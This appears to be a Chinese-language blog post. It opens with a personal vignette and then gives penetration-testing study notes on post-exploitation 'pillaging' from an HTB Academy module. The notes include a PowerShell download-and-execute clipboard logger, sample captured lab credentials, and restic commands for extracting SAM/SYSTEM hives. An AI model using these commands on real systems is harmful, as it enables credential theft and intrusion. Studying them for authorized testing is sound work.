會場裡人聲鼎沸,
交談、笑聲堆疊在一起。
我坐在人群中,卻怎麼都覺得不適應。
空氣混雜著太多訊號,
像是一個被塞滿的系統日誌,
分不清哪些是有用的,哪些只是雜訊。
腦子一片嘈雜,只想快點離開。
我已經放空一陣子了,
突然聽到熟悉的聲音—
「妳怎麼在這裡?」
回頭一看,是那個熟悉到不得了的他。
我對他說:
「我還沒開始講話,能量早就耗盡了。」
他什麼也沒表示,
只是安靜地坐在我身邊一起發呆。
突然間,氣氛變得安靜許多,
緊繃感慢慢散去。
我忽然想到—
這陪伴就像 Pillaging。
他早已默默取得我的信任,
幫我把吵雜環境裡的碎片一一整理:
哪些能忽略,哪些該留下,把我心底那些細碎的不安慢慢收起。
這種感覺,好微妙,
卻也讓人好安心。
Pillaging
(資訊掠奪),指的是在成功入侵一台系統之後,把裡面能找到的「有價值資訊」收集起來。
這些資訊可能包括:個人資料、信用卡資料、伺服器與網路架構細節、密碼、憑證或任何跟滲透測試、資安評估目標有關的敏感資訊。
因為這些資訊就像下一步的「通關鑰匙」:
它們能幫助我們繼續滲透更深一層的網路,或達成在測試前期和客戶約定好的任務目標。
這些資料可能散落在各種地方—
應用程式、服務、裝置裡,而且存放格式各異。很多時候,我們需要用特定的工具,才能把它們成功提取出來。
以下是一些可能蒐集資訊的來源:
任何能提供目標資訊的東西都很有價值 ~ 大家可以想想看:
根據企業規模、用途與測試範疇,我們有可能會遇到哪些資料?
熟悉常見應用、伺服器軟體與中介軟體有哪些?
需要了解一點:因為它們的資料格式與位置都不同,有時需要特殊工具才能提取或讀取。
我們先從比較簡單的地方看起,如 Clipboard、角色與服務 ~
使用者從密碼管理器貼上帳號/密碼、2FA Token 時,剪貼簿內容也能被抓取。
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/inguardians/Invoke-Clipboard/master/Invoke-Clipboard.ps1')
Invoke-ClipboardLogger
這時,我們可以等候敏感資料出現:
https://portal.azure.com
Administrator@ctfboy.com
CTFBoy<3Pillaging!
有些環境不一定適用,如:
隔離環境:Citrix
、VDI
或雲端桌面有時會禁用剪貼簿同步。
應用程式層阻擋:某些密碼管理器(例如 1Password、Bitwarden)有選項「自動清除剪貼簿」,幾秒內就清掉敏感資訊。
權限不足:如果我們只是在低權限 service 或別的帳號下跑程式,可能抓不到目標使用者的剪貼簿內容。
檔案 / 列印伺服器
Web / 資料庫伺服器
憑證頒發機構(CA)
原始碼管理伺服器
備份伺服器
攻擊備份伺服器
備份系統通常需要高權限帳號(常是本機管理員)。
若取得備份系統,即可能存取所有被備份的資料。
restic
是一個跨平台備份工具(Linux/BSD/Mac/Windows)。
它會用 RESTIC_PASSWORD
環境變數作為儲存庫密碼,若沒設定,就會要求輸入。
restic.exe -r E:\restic2 init
$env:RESTIC_PASSWORD = 'Password'
restic.exe -r E:\restic2\ backup C:\SampleFolder
restic.exe -r E:\restic2\ backup C:\Windows\System32\config --use-fs-snapshot
若無權限 → 顯示 Access is denied,會建立「空殼備份」。
restic.exe -r E:\restic2\ snapshots
列出所有快照。
restic.exe -r E:\restic2\ restore <ID> --target C:\Restore
還原目標目錄的資料。
透過備份可取得 SAM/SYSTEM hive、SSH Key、web.config 等敏感檔案。
# 寫久了好像就習慣了,寫完繼續加班 QAQ
HTB Academy - Windows Privilege Escalation - Pillaging: https://academy.hackthebox.com/module/67/section/1637